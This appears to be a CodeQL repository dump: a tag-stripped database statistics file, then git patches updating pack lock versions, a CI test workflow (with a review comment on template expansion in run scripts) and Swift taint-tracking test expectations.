- -1 -2 -26812 - - - - - - -id -parentid - - -12 - - -1 -2 -26812 - - - - - - -id -fileid - - -12 - - -1 -2 -26812 - - - - - - -text -id - - -12 - - -1 -2 -21517 - - -2 -62 -1416 - - - - - - -text -parentid - - -12 - - -1 -2 -21519 - - -2 -62 -1414 - - - - - - -text -fileid - - -12 - - -1 -2 -21522 - - -2 -62 -1411 - - - - - - -parentid -id - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -text - - -12 - - -1 -2 -26379 - - -2 -17 -167 - - - - - - -parentid -fileid - - -12 - - -1 -2 -26546 - - - - - - -fileid -id - - -12 - - -1 -2 -26161 - - -2 -17 -207 - - - - - - -fileid -text - - -12 - - -1 -2 -26165 - - -2 -17 -203 - - - - - - -fileid -parentid 
- - -12 - - -1 -2 -26223 - - -2 -10 -145 - - - - - - - - -xmlChars -439958 - - -id -439958 - - -text -100518 - - -parentid -433851 - - -idx -4 - - -isCDATA -1 - - -fileid -26494 - - - - -id -text - - -12 - - -1 -2 -439958 - - - - - - -id -parentid - - -12 - - -1 -2 -439958 - - - - - - -id -idx - - -12 - - -1 -2 -439958 - - - - - - -id -isCDATA - - -12 - - -1 -2 -439958 - - - - - - -id -fileid - - -12 - - -1 -2 -439958 - - - - - - -text -id - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -parentid - - -12 - - -1 -2 -60389 - - -2 -4 -3811 - - -4 -5 -29257 - - -5 -23171 -7061 - - - - - - -text -idx - - -12 - - -1 -2 -100517 - - -2 -3 -1 - - - - - - -text -isCDATA - - -12 - - -1 -2 -100518 - - - - - - -text -fileid - - -12 - - -1 -2 -61284 - - -2 -4 -4205 - - -4 -5 -28328 - - -5 -351 -6701 - - - - - - -parentid -id - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -text - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -idx - - -12 - - -1 -2 -429716 - - -2 -5 -4135 - - - - - - -parentid -isCDATA - - -12 - - -1 -2 -433851 - - - - - - -parentid -fileid - - -12 - - -1 -2 -433851 - - - - - - -idx -id - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -text - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -16 -17 -1 - - -100499 -100500 -1 - - - - - - -idx -parentid - - -12 - - -80 -81 -1 - - -1892 -1893 -1 - - -4135 -4136 -1 - - -433851 -433852 -1 - - - - - - -idx -isCDATA - - -12 - - -1 -2 -4 - - - - - - -idx -fileid - - -12 - - -4 -5 -1 - - -46 -47 -1 - - -97 -98 -1 - - -26494 -26495 -1 - - - - - - -isCDATA -id - - -12 - - -439958 -439959 -1 - - - - - - -isCDATA -text - - -12 - - -100518 -100519 -1 - - - - - - -isCDATA -parentid - - -12 - - -433851 -433852 -1 - - - - - - -isCDATA -idx - - -12 - - -4 -5 -1 - - - - - - -isCDATA -fileid - - -12 - - -26494 -26495 -1 - - - - - - -fileid -id - - -12 - - -1 -2 -25303 - - -2 -35123 -1191 - - - - - - -fileid -text - - 
-12 - - -1 -2 -25765 - - -2 -35123 -729 - - - - - - -fileid -parentid - - -12 - - -1 -2 -25312 - - -2 -35123 -1182 - - - - - - -fileid -idx - - -12 - - -1 -2 -26397 - - -2 -5 -97 - - - - - - -fileid -isCDATA - - -12 - - -1 -2 -26494 - - - - - - - - -xmllocations -3051056 - - -xmlElement -2982460 - - -location -3051056 - - - - -xmlElement -location - - -12 - - -1 -2 -2978326 - - -2 -24903 -4134 - - - - - - -location -xmlElement - - -12 - - -1 -2 -3051056 - - - - - - - - -filetype -1102 - - -file -1102 - - -filetype -3 - - - - -file -filetype - - -12 - - -1 -2 -1102 - - - - - - -filetype -file - - -12 - - -1 -2 -1 - - -162 -163 -1 - - -939 -940 -1 - - - - - - - - -configs -69795 - - -id -69795 - - - - - -configNames -69794 - - -id -69794 - - -config -69794 - - -name -12859 - - - - -id -config - - -12 - - -1 -2 -69794 - - - - - - -id -name - - -12 - - -1 -2 -69794 - - - - - - -config -id - - -12 - - -1 -2 -69794 - - - - - - -config -name - - -12 - - -1 -2 -69794 - - - - - - -name -id - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - -name -config - - -12 - - -1 -2 -4858 - - -2 -3 -593 - - -3 -4 -2806 - - -4 -10 -169 - - -10 -11 -1900 - - -11 -12 -1757 - - -12 -111 -776 - - - - - - - - -configValues -69691 - - -id -69691 - - -config -69691 - - -value -54399 - - - - -id -config - - -12 - - -1 -2 -69691 - - - - - - -id -value - - -12 - - -1 -2 -69691 - - - - - - -config -id - - -12 - - -1 -2 -69691 - - - - - - -config -value - - -12 - - -1 -2 -69691 - - - - - - -value -id - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - -value -config - - -12 - - -1 -2 -48220 - - -2 -4 -4804 - - -4 -546 -1375 - - - - - - - - -configLocations -209280 - - -locatable -209280 - - -location -209280 - - - - -locatable -location - - -12 - - -1 -2 -209280 - - - - - - -location -locatable - - -12 - - -1 -2 -209280 - - - - - - - - -extraction_time -378 - - -file -21 - - -extractionPhase -9 
- - -timerKind -2 - - -time -43 - - - - -file -extractionPhase - - -12 - - -9 -10 -21 - - - - - - -file -timerKind - - -12 - - -2 -3 -21 - - - - - - -file -time - - -12 - - -3 -4 -21 - - - - - - -extractionPhase -file - - -12 - - -21 -22 -9 - - - - - - -extractionPhase -timerKind - - -12 - - -2 -3 -9 - - - - - - -extractionPhase -time - - -12 - - -1 -2 -8 - - -42 -43 -1 - - - - - - -timerKind -file - - -12 - - -21 -22 -2 - - - - - - -timerKind -extractionPhase - - -12 - - -9 -10 -2 - - - - - - -timerKind -time - - -12 - - -22 -23 -2 - - - - - - -time -file - - -12 - - -1 -2 -42 - - -21 -22 -1 - - - - - - -time -extractionPhase - - -12 - - -1 -2 -42 - - -8 -9 -1 - - - - - - -time -timerKind - - -12 - - -1 -2 -42 - - -2 -3 -1 - - - - - - - - -extraction_data -21 - - -file -21 - - -cacheFile -21 - - -fromCache -1 - - -length -21 - - - - -file -cacheFile - - -12 - - -1 -2 -21 - - - - - - -file -fromCache - - -12 - - -1 -2 -21 - - - - - - -file -length - - -12 - - -1 -2 -21 - - - - - - -cacheFile -file - - -12 - - -1 -2 -21 - - - - - - -cacheFile -fromCache - - -12 - - -1 -2 -21 - - - - - - -cacheFile -length - - -12 - - -1 -2 -21 - - - - - - -fromCache -file - - -12 - - -21 -22 -1 - - - - - - -fromCache -cacheFile - - -12 - - -21 -22 -1 - - - - - - -fromCache -length - - -12 - - -21 -22 -1 - - - - - - -length -file - - -12 - - -1 -2 -21 - - - - - - -length -cacheFile - - -12 - - -1 -2 -21 - - - - - - -length -fromCache - - -12 - - -1 -2 -21 - - - - - - - - - diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 21e0b8bb0e9..c4ef87bc251 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml 
@@ -2,15 +2,25 @@
 lockVersion: 1.0.0
 dependencies:
 codeql/controlflow:
- version: 1.0.1
+ version: 1.0.10
 codeql/dataflow:
- version: 1.0.1
+ version: 1.1.4
+ codeql/javascript-all:
+ version: 2.0.2
+ codeql/mad:
+ version: 1.0.10
+ codeql/regex:
+ version: 1.0.10
 codeql/ssa:
- version: 1.0.1
+ version: 1.0.10
+ codeql/tutorial:
+ version: 1.0.10
 codeql/typetracking:
- version: 1.0.1
+ version: 1.0.10
 codeql/util:
- version: 1.0.1
+ version: 1.0.10
+ codeql/xml:
+ version: 1.0.10
 codeql/yaml:
- version: 1.0.1
+ version: 1.0.10
 compiled: false
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual
deleted file mode 100644
index 3c8904a86af..00000000000
--- a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual
+++ /dev/null
@@ -1 +0,0 @@
-| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. |
From df3b30489b515c36ce9ecd112cca15a6154d70df Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 13 Nov 2024 13:50:41 -0500
Subject: [PATCH 0697/1267] Add `--search-path` in test workflow
---
 .github/workflows/test.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 96fd8bdd1a4..9b07d1e7478 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -27,11 +27,11 @@ jobs:
 GITHUB_TOKEN: ${{ github.token }}
 run: |
 gh repo clone github/codeql
- codeql pack install "ql/lib"
- codeql pack install "ql/src"
- codeql pack install "ql/test"
+ codeql pack ci "ql/lib"
+ codeql pack ci "ql/src"
+ codeql pack ci "ql/test"
 - name: Run Tests
 env:
 GITHUB_TOKEN: ${{ github.token }}
 run: |
- codeql test run ql/test
+ codeql test run --search-path "${{ github.workspace }}/extractor" ql/test
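Review bot: The added `--search-path "${{ github.workspace }}/extractor"` on the last line of the test.yml hunk expands a workflow expression straight into the text of the `run:` script, which is the shape that expression-injection checks flag. `github.workspace` is set by the runner rather than by a contributor, so this is probably not exploitable as written, but the shell already has the same value in `$GITHUB_WORKSPACE`. Writing the line as `codeql test run --search-path "$GITHUB_WORKSPACE/extractor" ql/test` keeps the script free of template expansion and consistent with passing `GITHUB_TOKEN` through `env:`. A one-line comment such as `# extractor pack is resolved from the checked-out workspace` would also record why the search path is needed. The job and its earlier steps start outside the hunk, so whether the `extractor` directory exists at this point cannot be confirmed from here.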
From f0dc4f5ec32531fd22e06005b122b9f9edda3cd1 Mon Sep 17 00:00:00 2001
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com>
Date: Thu, 14 Nov 2024 16:30:40 +0000
Subject: [PATCH 0698/1267] Swift: Convert the dataflow-taint-core-conversions test to labelled sources.
---
 .../dataflow/taint/core/LocalTaint.expected | 114 ++---
 .../dataflow/taint/core/Taint.expected | 466 +++++++++---------
 .../dataflow/taint/core/TaintInline.expected | 30 +-
 .../dataflow/taint/core/conversions.swift | 208 ++++----
 4 files changed, 409 insertions(+), 409 deletions(-)
diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected
index 06aba1f48bf..c0a08c715a8 100644
--- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected
+++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected
@@ -17,46 +17,46 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | -| conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | -| conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | -| conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | -| conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:30 | call to String.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | +| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | +| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | +| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | | conversions.swift:39:6:39:6 | SSA def(arr) | conversions.swift:40:12:40:12 | arr | | conversions.swift:39:6:39:6 | arr | conversions.swift:39:6:39:6 | SSA def(arr) | -| conversions.swift:39:12:39:30 | [...] | conversions.swift:39:6:39:6 | arr | +| conversions.swift:39:12:39:39 | [...] | conversions.swift:39:6:39:6 | arr | | conversions.swift:40:12:40:12 | arr | conversions.swift:41:12:41:12 | arr | | conversions.swift:41:12:41:12 | [post] arr | conversions.swift:42:20:42:20 | arr | | conversions.swift:41:12:41:12 | arr | conversions.swift:41:12:41:17 | ...[...] 
| | conversions.swift:41:12:41:12 | arr | conversions.swift:42:20:42:20 | arr | | conversions.swift:42:20:42:20 | arr | conversions.swift:43:20:43:20 | arr | | conversions.swift:43:12:43:23 | call to Array.init(_:) | conversions.swift:43:12:43:26 | ...[...] | -| conversions.swift:44:20:44:33 | call to sourceString() | conversions.swift:44:20:44:35 | .utf8 | -| conversions.swift:45:12:45:39 | call to Array.init(_:) | conversions.swift:45:12:45:42 | ...[...] | -| conversions.swift:45:20:45:33 | call to sourceString() | conversions.swift:45:20:45:35 | .utf8 | +| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | +| conversions.swift:45:12:45:48 | call to Array.init(_:) | conversions.swift:45:12:45:51 | ...[...] | +| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | | conversions.swift:47:5:47:9 | let ...? | conversions.swift:47:9:47:9 | v | | conversions.swift:47:9:47:9 | SSA def(v) | conversions.swift:48:13:48:13 | v | | conversions.swift:47:9:47:9 | v | conversions.swift:47:9:47:9 | SSA def(v) | -| conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:47:5:47:9 | let ...? | +| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:47:5:47:9 | let ...? | | conversions.swift:51:6:51:6 | SSA def(v2) | conversions.swift:52:12:52:12 | v2 | | conversions.swift:51:6:51:6 | v2 | conversions.swift:51:6:51:6 | SSA def(v2) | | conversions.swift:51:6:51:10 | ... as ... | conversions.swift:51:6:51:6 | v2 | -| conversions.swift:51:18:51:41 | call to numericCast(_:) | conversions.swift:51:6:51:10 | ... as ... | -| conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:51:18:51:41 | call to numericCast(_:) | +| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:51:6:51:10 | ... as ... 
| +| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | | conversions.swift:54:6:54:6 | SSA def(v4) | conversions.swift:55:12:55:12 | v4 | | conversions.swift:54:6:54:6 | v4 | conversions.swift:54:6:54:6 | SSA def(v4) | | conversions.swift:54:6:54:10 | ... as ... | conversions.swift:54:6:54:6 | v4 | -| conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | conversions.swift:54:6:54:10 | ... as ... | -| conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | +| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:54:6:54:10 | ... as ... | +| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | | conversions.swift:57:6:57:6 | SSA def(v5) | conversions.swift:58:12:58:12 | v5 | | conversions.swift:57:6:57:6 | v5 | conversions.swift:57:6:57:6 | SSA def(v5) | -| conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | +| conversions.swift:57:11:57:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | | conversions.swift:60:6:60:6 | SSA def(v6) | conversions.swift:61:12:61:12 | v6 | | conversions.swift:60:6:60:6 | v6 | conversions.swift:60:6:60:6 | SSA def(v6) | -| conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | +| conversions.swift:60:11:60:48 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | | conversions.swift:63:6:63:6 | SSA def(v7) | conversions.swift:64:12:64:12 | v7 | | conversions.swift:63:6:63:6 | v7 | conversions.swift:63:6:63:6 | SSA def(v7) | -| conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:63:6:63:6 | v7 | -| conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:63:11:63:26 | call to abs(_:) | +| conversions.swift:63:11:63:35 | call to abs(_:) | 
conversions.swift:63:6:63:6 | v7 | +| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | | conversions.swift:66:6:66:6 | SSA def(v8) | conversions.swift:67:12:67:12 | v8 | | conversions.swift:66:6:66:6 | v8 | conversions.swift:66:6:66:6 | SSA def(v8) | | conversions.swift:66:18:66:18 | 0 | conversions.swift:66:6:66:6 | v8 | 
@@ -64,13 +64,13 @@ | conversions.swift:67:12:67:12 | v8 | conversions.swift:68:12:68:12 | v8 | | conversions.swift:68:12:68:12 | [post] v8 | conversions.swift:69:12:69:12 | v8 | | conversions.swift:68:12:68:12 | v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:71:12:71:36 | call to Self.init(exactly:) | conversions.swift:71:12:71:37 | ...! | -| conversions.swift:72:12:72:39 | call to Self.init(exactly:) | conversions.swift:72:12:72:40 | ...! | -| conversions.swift:75:12:75:41 | call to Self.init(_:radix:) | conversions.swift:75:12:75:42 | ...! | -| conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | -| conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | -| conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | -| conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | +| conversions.swift:71:12:71:45 | call to Self.init(exactly:) | conversions.swift:71:12:71:46 | ...! | +| conversions.swift:72:12:72:48 | call to Self.init(exactly:) | conversions.swift:72:12:72:49 | ...! | +| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) | conversions.swift:75:12:75:51 | ...! 
| +| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | +| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | +| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | +| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | | conversions.swift:82:7:82:7 | SSA def(q1) | conversions.swift:83:12:83:12 | q1 | | conversions.swift:82:7:82:7 | q1 | conversions.swift:82:7:82:7 | SSA def(q1) | | conversions.swift:82:11:82:11 | SSA def(r1) | conversions.swift:84:12:84:12 | r1 | 
@@ -80,12 +80,12 @@ | conversions.swift:86:7:86:7 | q2 | conversions.swift:86:7:86:7 | SSA def(q2) | | conversions.swift:86:11:86:11 | SSA def(r2) | conversions.swift:88:12:88:12 | r2 | | conversions.swift:86:11:86:11 | r2 | conversions.swift:86:11:86:11 | SSA def(r2) | -| conversions.swift:86:17:86:63 | call to quotientAndRemainder(dividingBy:) | conversions.swift:86:6:86:13 | (...) | +| conversions.swift:86:17:86:72 | call to quotientAndRemainder(dividingBy:) | conversions.swift:86:6:86:13 | (...) | | conversions.swift:90:7:90:7 | SSA def(q3) | conversions.swift:91:12:91:12 | q3 | | conversions.swift:90:7:90:7 | q3 | conversions.swift:90:7:90:7 | SSA def(q3) | | conversions.swift:90:11:90:11 | SSA def(r3) | conversions.swift:92:12:92:12 | r3 | | conversions.swift:90:11:90:11 | r3 | conversions.swift:90:11:90:11 | SSA def(r3) | -| conversions.swift:90:17:90:66 | call to quotientAndRemainder(dividingBy:) | conversions.swift:90:6:90:13 | (...) | +| conversions.swift:90:17:90:75 | call to quotientAndRemainder(dividingBy:) | conversions.swift:90:6:90:13 | (...) | | conversions.swift:94:6:94:6 | SSA def(pair1) | conversions.swift:95:12:95:12 | pair1 | | conversions.swift:94:6:94:6 | pair1 | conversions.swift:94:6:94:6 | SSA def(pair1) | | conversions.swift:94:14:94:44 | call to addingReportingOverflow(_:) | conversions.swift:94:6:94:6 | pair1 | 
@@ -93,38 +93,38 @@ | conversions.swift:95:12:95:12 | pair1 | conversions.swift:96:12:96:12 | pair1 | | conversions.swift:98:6:98:6 | SSA def(pair2) | conversions.swift:99:12:99:12 | pair2 | | conversions.swift:98:6:98:6 | pair2 | conversions.swift:98:6:98:6 | SSA def(pair2) | -| conversions.swift:98:14:98:51 | call to addingReportingOverflow(_:) | conversions.swift:98:6:98:6 | pair2 | +| conversions.swift:98:14:98:60 | call to addingReportingOverflow(_:) | conversions.swift:98:6:98:6 | pair2 | | conversions.swift:99:12:99:12 | [post] pair2 | conversions.swift:100:12:100:12 | pair2 | | conversions.swift:99:12:99:12 | pair2 | conversions.swift:100:12:100:12 | pair2 | | conversions.swift:102:6:102:6 | SSA def(pair3) | conversions.swift:103:12:103:12 | pair3 | | conversions.swift:102:6:102:6 | pair3 | conversions.swift:102:6:102:6 | SSA def(pair3) | -| conversions.swift:102:14:102:54 | call to addingReportingOverflow(_:) | conversions.swift:102:6:102:6 | pair3 | +| conversions.swift:102:14:102:63 | call to addingReportingOverflow(_:) | conversions.swift:102:6:102:6 | pair3 | | conversions.swift:103:12:103:12 | [post] pair3 | conversions.swift:104:12:104:12 | pair3 | | conversions.swift:103:12:103:12 | pair3 | conversions.swift:104:12:104:12 | pair3 | -| conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | -| conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | -| conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | -| conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | -| conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | -| conversions.swift:114:12:114:34 | call to String.init(_:) | conversions.swift:114:12:114:36 | .utf8 | -| conversions.swift:114:19:114:33 | 
call to sourceFloat80() | conversions.swift:114:12:114:34 | call to String.init(_:) | -| conversions.swift:115:19:115:32 | call to sourceDouble() | conversions.swift:115:12:115:33 | call to String.init(_:) | -| conversions.swift:116:12:116:33 | call to String.init(_:) | conversions.swift:116:12:116:35 | .utf8 | -| conversions.swift:116:19:116:32 | call to sourceDouble() | conversions.swift:116:12:116:33 | call to String.init(_:) | -| conversions.swift:118:18:118:30 | call to sourceFloat() | conversions.swift:118:12:118:31 | call to Float.init(_:) | -| conversions.swift:119:41:119:51 | call to sourceInt() | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:119:67:119:67 | 0.0 | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:41:120:41 | 0 | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:57:120:69 | call to sourceFloat() | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:121:54:121:54 | 0.0 | conversions.swift:121:12:121:57 | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:122:44:122:56 | call to sourceFloat() | conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:124:12:124:24 | call to sourceFloat() | conversions.swift:124:12:124:26 | .exponent | -| conversions.swift:125:12:125:24 | call to sourceFloat() | conversions.swift:125:12:125:26 | .significand | -| conversions.swift:126:12:126:26 | call to sourceFloat80() | conversions.swift:126:12:126:28 | .exponent | -| conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | -| conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | -| conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | 
.significand | -| conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | +| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | +| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | +| conversions.swift:112:12:112:41 | call to String.init(_:) | conversions.swift:112:12:112:43 | .utf8 | +| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:41 | call to String.init(_:) | +| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | +| conversions.swift:114:12:114:43 | call to String.init(_:) | conversions.swift:114:12:114:45 | .utf8 | +| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:43 | call to String.init(_:) | +| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | +| conversions.swift:116:12:116:42 | call to String.init(_:) | conversions.swift:116:12:116:44 | .utf8 | +| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:42 | call to String.init(_:) | +| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | +| conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:119:76:119:76 | 0.0 | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:120:41:120:41 | 0 | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | +| 
conversions.swift:121:63:121:63 | 0.0 | conversions.swift:121:12:121:66 | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | +| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | +| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | +| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | +| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | +| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | +| conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | | conversions.swift:138:6:138:6 | SSA def(ms1) | conversions.swift:139:12:139:12 | ms1 | | conversions.swift:138:6:138:6 | ms1 | conversions.swift:138:6:138:6 | SSA def(ms1) | | conversions.swift:138:12:138:26 | call to MyString.init(_:) | conversions.swift:138:12:138:27 | ...! | 
@@ -140,9 +140,9 @@ | conversions.swift:141:12:141:12 | ms1 | conversions.swift:142:12:142:12 | ms1 | | conversions.swift:144:6:144:6 | SSA def(ms2) | conversions.swift:145:12:145:12 | ms2 | | conversions.swift:144:6:144:6 | ms2 | conversions.swift:144:6:144:6 | SSA def(ms2) | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:144:12:144:36 | ...! | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:144:6:144:6 | ms2 | -| conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:144:12:144:35 | call to MyString.init(_:) | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:144:12:144:46 | ...! | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:144:6:144:6 | ms2 | +| conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) | | conversions.swift:145:12:145:12 | [post] ms2 | conversions.swift:146:12:146:12 | ms2 | | conversions.swift:145:12:145:12 | ms2 | conversions.swift:146:12:146:12 | ms2 | | conversions.swift:146:12:146:12 | [post] ms2 | conversions.swift:147:12:147:12 | ms2 | @@ -154,7 +154,7 @@ | conversions.swift:152:6:152:6 | SSA def(parent) | conversions.swift:153:12:153:12 | parent | | conversions.swift:152:6:152:6 | parent | conversions.swift:152:6:152:6 | SSA def(parent) | | conversions.swift:152:6:152:15 | ... as ... | conversions.swift:152:6:152:6 | parent | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:152:6:152:15 | ... as ... | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:152:6:152:15 | ... as ... | | conversions.swift:153:12:153:12 | [post] parent | conversions.swift:154:12:154:12 | parent | | conversions.swift:153:12:153:12 | parent | conversions.swift:154:12:154:12 | parent | | conversions.swift:154:12:154:12 | [post] parent | conversions.swift:156:40:156:40 | parent | 
